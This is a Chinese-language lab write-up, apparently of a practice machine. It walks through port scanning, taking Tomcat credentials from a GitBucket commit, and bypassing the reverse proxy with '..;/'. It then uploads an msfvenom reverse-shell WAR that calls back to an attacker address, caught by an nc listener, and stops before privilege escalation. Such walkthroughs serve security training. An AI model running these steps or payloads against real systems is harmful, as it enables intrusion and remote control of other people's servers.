迷糊的提权方式以及利用ssrf到最终提权靶机(二)

简介: 迷糊的提权方式以及利用ssrf到最终提权靶机

第二台 利用ansible-playbook提权

第二台

目标ip:10.10.10.250拿到目标还是先扫描端口 进行信息收集

c1c31e163e9d7db1a9bd86d39a6738b7_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

命令:nmap -v -sSV -Pn 10.10.10.250 -T4 -sC发现开了22 443 8080直接先打开8080端口看看

f5d550a41496236ba89beb9ddbc2de66_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现是一个登陆框 cms是 gitbucket试了下弱口令 发现不存在 那就注册一个

a20e047776b1a2f952fbfee81a78060e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

注册之后然后登录

b832c7a2ba81b2495b636537634b34da_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

这应该是一个代码仓库

d5f136fd907357ccab227de6ebced6db_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

因为前面还有443端口开发 打开443端口看看

73c84ee8bbbaf094f57ecd71db800882_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

之前nmap扫描出443端口,但是无法访问https,写入hosts尝试登录添加到host 因为扫描出有一个seal.xxx

64f2745e2297a08037f99c4d6f4c7843_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

echo 10.10.10.250 seal.xxx >> /etc/hosts是一个商城 那8080 的的确是443的代码库

然后继续翻代码库 通过找最近commits 在tomcat里面翻到了账户密码

523fff1e24d947b17a18e3d8130f0917_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

b3f26511f840f87666bf6f5c760d5fb5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

http://10.10.10.250:8080/root/seal_market/commit/971f3aa3f0a0cc8aac12fd696d9631ca540f44c7username = tomcatpassword = 42MrHBf*z8{Z%尝试访问tomcat默认登录目录/manager/statushttps://seal.xxx/manager/status

69eb1427c19a9292b723bbbc93858432_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

输入找到的账户密码 成功登录

93fabcd8173e7555a84266e919cb40bf_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

因为前面根据nmap 扫描出tomcat是通过反代的 这样会存在一个问题这个问题这里参考https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/管理界面/manager/html无法访问显示权限不够

007dbb715d48b11ae09b4773a9bdab87_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

这里就可以利用tomcat 和反代的漏洞 用..;/绕过

2c71dcab7a22080966530d07f819712f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

https://seal.xxx/manager/status/..;/html然后这里有一个上传的地方

04973f671664bce81514b8fefea4708b_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后打包一个war包的shell上传msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.46 LPORT=6666 -f war -o shell.war

在上传之前,请记住一件事。这里存在路径遍历漏洞。所以,你不能直接上传.war文件。唯一的过程是在上传之前修改路径,因此我在Burpsuite中拦截了上传请求以进一步修改。

06990d90cdf81514eeaf6904935ddbd3_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

1927361f1aa0a28cd331e9efb7680503_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

上传之后 开启监听 然后访问 https://seal.xxx/shell/nc -lvvp 6666

c54336971c94fb047cd941f20745e835_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

1e2a5e3b8a14bd496a88d5d99a5738c9_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现还有个luis 这个开始在8080端口里面也发现了

574463fbc074bb33c9f68af5c2626384_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后在lusi目录下发现user.txt

0cdedca825856c3c487cff0bc0b7afa0_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

命令:find / -name user.txt但是查看user.txt的时候发现没有权限

374cfef033815812e5b050bbeaecc60c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

需要提权了

相关文章
|
安全 NoSQL API
【漏洞复现】YApi NoSQL注入导致远程命令执行漏洞
YApi是一个API管理工具。在其1.12.0版本之前,存在一处NoSQL注入漏洞,通过该漏洞攻击者可以窃取项目Token,并利用这个Token执行任意Mock脚本,获取服务器权限。
1556 1
|
安全 PHP Apache
记一次匈牙利服务器提权案例
记一次匈牙利服务器提权案例
85 0
|
5月前
|
安全 Shell PHP
一篇文章讲明白Kali学习笔记30:身份认证与命令执行漏洞
一篇文章讲明白Kali学习笔记30:身份认证与命令执行漏洞
24 0
|
开发框架 安全 .NET
记一次绕过安全狗和360提权案例
记一次绕过安全狗和360提权案例
160 0
|
安全 API 网络安全
绕过IIS命令执行防护提权
绕过IIS命令执行防护提权
149 0
|
安全 关系型数据库 MySQL
黑吃黑Getshell到提权实战案例
黑吃黑Getshell到提权实战案例
324 0
|
运维 关系型数据库 MySQL
绕过360安全卫士提权实战案例
绕过360安全卫士提权实战案例
399 1
|
XML 开发框架 安全
记一次后门爆破到提权实战案例
记一次后门爆破到提权实战案例
92 0
Potato土豆提权工具绕过防护思路-1
Potato土豆提权工具绕过防护思路-1
191 0
|
安全 Linux Windows
WEB漏洞-RCE代码及命令执行漏洞
WEB漏洞-RCE代码及命令执行漏洞